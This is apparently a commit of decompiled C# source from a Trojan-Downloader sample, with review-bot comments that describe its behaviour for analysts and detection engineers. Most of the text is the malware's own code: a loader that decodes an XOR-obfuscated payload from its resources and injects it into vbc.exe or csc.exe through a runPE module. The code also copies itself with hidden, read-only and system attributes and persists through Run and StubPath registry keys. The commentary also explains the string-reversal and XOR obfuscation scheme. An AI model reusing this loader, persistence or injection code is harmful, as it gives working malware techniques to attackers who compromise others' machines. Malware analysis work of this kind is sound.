Path.GetPathRoot(Environment.GetFolderPath(Environment.SpecialFolder.System));
switch (this.Odlyq3qfbpoq3mg0so5fipxwu)
{
case "0":
try
{
this.Odlyq3qfbpoq3mg0so5fipxwu = IntPtr.Size != 4 ? Environment.GetEnvironmentVariable(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("ridniw")) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("exe.cbv\\72705.0.2v\\46krowemarF\\TEN.tfosorciM\\") : Environment.GetEnvironmentVariable(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("ridniw")) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("exe.cbv\\72705.0.2v\\krowemarF\\TEN.tfosorciM\\");
break;
}
catch (Exception ex)
{
break;
}
case "1":
this.Odlyq3qfbpoq3mg0so5fipxwu = Environment.GetEnvironmentVariable(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("ridniw")) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("exe.csc\\72705.0.2v\\krowemarF\\TEN.tfosorciM\\");
break;
}
this.cwygyk0oxmm4oly4f = Convert.ToBoolean(strArray4[1]);
this.Obpmsku4cgcztab1lmoobkyt5 = strArray4[2];
this.gkgcqdokyjuxym4wq0314usgk = strArray4[3];
this.nd5mirnaddlzplmuj2yyvlyhv = strArray4[4];
this.Jxy14wwtwogymn1qrjcja2xpw = strArray4[5];
this.Mebghajzp0czroix5exzsbjcb = Convert.ToBoolean(strArray4[6]);
this.rkkwfbuqo0azkksqy = Convert.ToBoolean(strArray4[7]);
this.buvpnbb4jdddrparyku5zhpzb = Convert.ToBoolean(strArray4[8]);
this.cgkruwksz1uyngdvorfai14estiwjwa22 = Convert.ToBoolean(strArray4[9]);
this.nd5mirnaddlzplmuj2yyvlyhv = this.rxto5yfudomwo4quiatvxlgxu(this.nd5mirnaddlzplmuj2yyvlyhv);
MessageBoxButtons[] messageBoxButtonsArray = new MessageBoxButtons[6]
{
MessageBoxButtons.OK,
MessageBoxButtons.OKCancel,
MessageBoxButtons.YesNo,
MessageBoxButtons.YesNoCancel,
MessageBoxButtons.RetryCancel,
MessageBoxButtons.AbortRetryIgnore
};
MessageBoxIcon[] messageBoxIconArray = new MessageBoxIcon[5]
{
MessageBoxIcon.Hand,
MessageBoxIcon.Asterisk,
MessageBoxIcon.Question,
MessageBoxIcon.Exclamation,
MessageBoxIcon.None
};
if (!(this.H43ao0q1ckx2y3w0qhozixdn5 == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1")))
return;
Thread.Sleep(this.Byijlyljtwhknkf5jkcwcjhnmxbyfow1f * 1000);
int num = (int) MessageBox.Show(this.vazu5g3yn2qoupbzrnflcm5ta, this.jfq5w2hqrukvsivotb2eaetcj, messageBoxButtonsArray[this.C2zbxxi4za2fdbthchmjymbz0], messageBoxIconArray[this.Zusxmm13kjq0lro02]);
}
public void fkjhdaxsce2gfuv1fe5y42qsk()
{
string executablePath = Application.ExecutablePath;
try
{
this.i4apa2zau4uyfet5mwpyrsauzpucwiech(panz0mon2f5aateyhtphwozah.Dsknrcn3xgwm4kutqcymeqtg4(this.n321udrptnm3xnkdwdxsh0wft(executablePath, 55, wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("2U1TFWIUJIOH2YSDWUUDE1JLPQHUHN0TQ"))));
this.Tts2baf3wiatv5ghnswu3fu4o = this.n321udrptnm3xnkdwdxsh0wft(executablePath, 38, wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("PQDKZJWPOV44MQSBJ"));
if (this.act0dsy5xkcjtyk4udzmsxpor == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1"))
this.Tts2baf3wiatv5ghnswu3fu4o = this.h3mz2iy1yrgiwje2h(this.Tts2baf3wiatv5ghnswu3fu4o, this.vu05zlvgf2zzuc3uhqtm0qh2kdijzsnxb);
this.Tts2baf3wiatv5ghnswu3fu4o = this.pcbc3w2jxlqgmdfs0dlf3dbkc(this.Tts2baf3wiatv5ghnswu3fu4o);
if (!this.cxhxnrorc5mp1ujxhtq1kbke4)
{
this.zuc0g2puhfoogprwx4kio2wu1 = this.Xthp414gtl2l4oueqfpd4vbwz(0);
this.Gdjkuqh0cbgb2rrfkrtpdepl3.Invoke(this.zuc0g2puhfoogprwx4kio2wu1, new object[3]
{
(object) this.Tts2baf3wiatv5ghnswu3fu4o,
(object) this.Odlyq3qfbpoq3mg0so5fipxwu,
(object) wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("")
});
}
else
this.Eapnz3st2tmrdospqmsffns5v(this.Tts2baf3wiatv5ghnswu3fu4o);
if (this.Fkgl04y45wljpapzd)
this.c55ygxxz3rp1vsemw5o013b42(this.Tts2baf3wiatv5ghnswu3fu4o, this.U5rbzma1hlby3eyyhjbmc5kyd, true);
string str;
if (!string.IsNullOrEmpty(this.Zjtchyef12cwxg4onylzlprmn))
{
str = this.Kkrle03d2ekkcyuc2c2102hjd + this.Zjtchyef12cwxg4onylzlprmn + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\") + this.mqmfhbfuww2freoox;
Directory.CreateDirectory(this.Kkrle03d2ekkcyuc2c2102hjd + this.Zjtchyef12cwxg4onylzlprmn);
}
else
str = this.Kkrle03d2ekkcyuc2c2102hjd + this.mqmfhbfuww2freoox;
if (this.mehj1nkb5kab31y4pa5zzd3zh == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1"))
this.Ruzxivkrma3hdd1il(this.ljjgffrum0vanmiev3ujguzbfjpaluf1a, this.Dxpmu5z21l0jogt41vcdm0t2p, str, 1);
if (this.Z2sx3vgolcrkx42a5b2bhnmdt == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1"))
this.Ruzxivkrma3hdd1il(this.ljjgffrum0vanmiev3ujguzbfjpaluf1a, this.hdb50yp4mb51cxajtk2qahcip, str, 2);
if (this.wvlwdt5q3igbdkbluauqgzxazzitgesk2 == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1"))
this.Ruzxivkrma3hdd1il(this.Ns5tkmgwpxzdzhfzygk50izkv, this.Qmztipvjjobds0bdpgipbz14g, str, 3);
if (this.sdztd0ena42ywf4cfnspntfxhjgjjuo2x)
{
byte[] bytes = System.IO.File.ReadAllBytes(Application.ExecutablePath);
if (!System.IO.File.Exists(str))
System.IO.File.WriteAllBytes(str, bytes);
if (System.IO.File.Exists(str))
{
if (this.hyrbz1kfxjvaxj0vistcunjymen3kporm == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1"))
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.Hidden);
if (this.Ajiami1b52zvc3vohgymtmh5a == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1"))
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.ReadOnly);
if (this.R3u01lftwibuhcd22 == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1"))
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.System);
}
}
this.Myk2onyuqzunnxikmdzm0nc2t(panz0mon2f5aateyhtphwozah.Dsknrcn3xgwm4kutqcymeqtg4(this.n321udrptnm3xnkdwdxsh0wft(executablePath, 95, wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("NDLAWVBMC2KZBPWFB5J3JGQNQ"))));
if (!this.cwygyk0oxmm4oly4f)
return;
this.Dsqyxep1xbkqqwuokcmpwlnunygdkudqf();
}
catch (Exception ex)
{
Console.WriteLine(ex.Message);
}
}
private void Ruzxivkrma3hdd1il(
string u0jp0x5zrl0q5ayh3v2w1bp40,
string Ef15akjyi4th4fsci,
string iep4bqxi0rq5itx040ytg2d2x0q13s5of,
int Fzyx2nfbtm3vn3bdgfaytm0sm)
{
this.sdztd0ena42ywf4cfnspntfxhjgjjuo2x = true;
if (Fzyx2nfbtm3vn3bdgfaytm0sm == 1)
Registry.CurrentUser.OpenSubKey(u0jp0x5zrl0q5ayh3v2w1bp40, true).SetValue(Ef15akjyi4th4fsci, (object) iep4bqxi0rq5itx040ytg2d2x0q13s5of);
if (Fzyx2nfbtm3vn3bdgfaytm0sm == 2)
Registry.LocalMachine.OpenSubKey(u0jp0x5zrl0q5ayh3v2w1bp40, true).SetValue(Ef15akjyi4th4fsci, (object) iep4bqxi0rq5itx040ytg2d2x0q13s5of);
if (Fzyx2nfbtm3vn3bdgfaytm0sm != 3)
return;
RegistryKey subKey = Registry.LocalMachine.CreateSubKey(u0jp0x5zrl0q5ayh3v2w1bp40 + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\") + Ef15akjyi4th4fsci);
subKey.SetValue(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("htaPbutS"), (object) iep4bqxi0rq5itx040ytg2d2x0q13s5of);
subKey.Close();
if (Registry.CurrentUser.OpenSubKey(u0jp0x5zrl0q5ayh3v2w1bp40 + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\") + Ef15akjyi4th4fsci, true) == null)
return;
Registry.CurrentUser.DeleteSubKey(u0jp0x5zrl0q5ayh3v2w1bp40 + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\") + Ef15akjyi4th4fsci, false);
}
private static void Main(string[] args) => new ekrod4bellvfxnmof().fkjhdaxsce2gfuv1fe5y42qsk();
}
}
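Review bot: The file carries only the decompiler banner, and with every identifier randomised a reader cannot triage it without tracing each call; a summary comment above `public class ekrod4bellvfxnmof` is missing. It should state that `fkjhdaxsce2gfuv1fe5y42qsk` reads resources 55, 38 and 95 from the running executable, parses the first as delimiter-separated configuration, optionally gunzips and XOR-decodes the second, and hands that payload either to the `Run` method of the assembly loaded from the embedded `runPE.dll` resource or to `Assembly.Load(...).EntryPoint`. For detection engineering the comment should also list the host-visible artefacts: a path under `%windir%\Microsoft.NET\Framework\v2.0.50727\` (`vbc.exe` or `csc.exe`) passed as the second argument to `Run`, registry values written through `Ruzxivkrma3hdd1il` including a `StubPath` value under `Registry.LocalMachine`, Hidden/ReadOnly/System attributes set on the copied executable, and the `WebClient.DownloadData` fetch in `Dsqyxep1xbkqqwuokcmpwlnunygdkudqf` whose result is loaded or written to disk and started. The registry key paths, URL and file names come from the configuration resource and are not visible in this file, so the comment should say that rather than guess them.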
@@ -0,0 +1,33 @@
// Decompiled with JetBrains decompiler
// Type: panz0mon2f5aateyhtphwozah
// Assembly: hh2ifwz3, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 68766CC0-7547-4113-80E9-8D0602728CEB
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe.exe
using System;
using System.Text;
public static class panz0mon2f5aateyhtphwozah
{
public static string Dsknrcn3xgwm4kutqcymeqtg4(byte[] Re2ucj3x4frepzs3c)
{
StringBuilder stringBuilder = new StringBuilder();
for (int index = 0; index < Re2ucj3x4frepzs3c.Length; ++index)
{
char ch = Convert.ToChar(Re2ucj3x4frepzs3c[index]);
stringBuilder.Append(Convert.ToString(ch));
}
return stringBuilder.ToString();
}
public static byte[] ydxqx4ckpkuemhnp4n2eb4laj(string Kos13k2jgfqobt5uhqj5cspab)
{
byte[] numArray = new byte[Kos13k2jgfqobt5uhqj5cspab.Length];
for (int startIndex = 0; startIndex < Kos13k2jgfqobt5uhqj5cspab.Length; ++startIndex)
{
char ch = Convert.ToChar(Kos13k2jgfqobt5uhqj5cspab.Substring(startIndex, 1));
numArray[startIndex] = Convert.ToByte(ch);
}
return numArray;
}
}
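Review bot: Neither helper has a comment saying that it maps bytes and chars one-to-one, which an analyst needs to know to reproduce the configuration decoding offline (the loader class in this commit runs its resource bytes through `Dsknrcn3xgwm4kutqcymeqtg4` before splitting them). The first widens each byte to the char with the same code, equivalent to ISO-8859-1 decoding, and the second narrows each char with `Convert.ToByte`, which throws `OverflowException` for any char above 0xFF. I would add `// byte[] -> string, one char per byte (Latin-1 equivalent)` above `Dsknrcn3xgwm4kutqcymeqtg4` and `// string -> byte[], one byte per char; chars > 0xFF throw OverflowException` above `ydxqx4ckpkuemhnp4n2eb4laj`.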
@@ -0,0 +1,29 @@
// Decompiled with JetBrains decompiler
// Type: wisp1ff1rpzacn3jgfnasrkhmiolo44qt
// Assembly: hh2ifwz3, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 68766CC0-7547-4113-80E9-8D0602728CEB
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe.exe
using System;
public static class wisp1ff1rpzacn3jgfnasrkhmiolo44qt
{
public static int jqzvokzk5t335inc0xp55epz5 = 129;
public static byte[] br40vohypenwwv4th(byte[] Zkk3bd233f1xrgcd4m411ibwr)
{
for (int index = 0; index < Zkk3bd233f1xrgcd4m411ibwr.Length; ++index)
{
char ch = (char) ((uint) Convert.ToChar(Zkk3bd233f1xrgcd4m411ibwr[index]) ^ (uint) wisp1ff1rpzacn3jgfnasrkhmiolo44qt.jqzvokzk5t335inc0xp55epz5);
Zkk3bd233f1xrgcd4m411ibwr[index] = Convert.ToByte(ch);
}
return Zkk3bd233f1xrgcd4m411ibwr;
}
public static string Kdmkmnso0da20rhdguq3p4oj1cpbgyqri(string s)
{
char[] charArray = s.ToCharArray();
Array.Reverse((Array) charArray);
return new string(charArray);
}
}
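Review bot: Nothing in this file says that `Kdmkmnso0da20rhdguq3p4oj1cpbgyqri` is the string-literal decoder, so literals wrapped in it elsewhere in the commit (for example `"lld.EPnur"` or `"htaPbutS"`) read as noise until the reader works it out. A one-line comment above it such as `// Reverses s; literals passed through this call are stored back to front.` would fix that. `br40vohypenwwv4th` deserves `// XORs every byte with jqzvokzk5t335inc0xp55epz5 (129 = 0x81) in place and returns the same array.` The in-place mutation matters when replaying the decoding during analysis. Because the key is a public non-readonly static, its value at run time should be confirmed rather than assumed, although nothing in the files shown reassigns it.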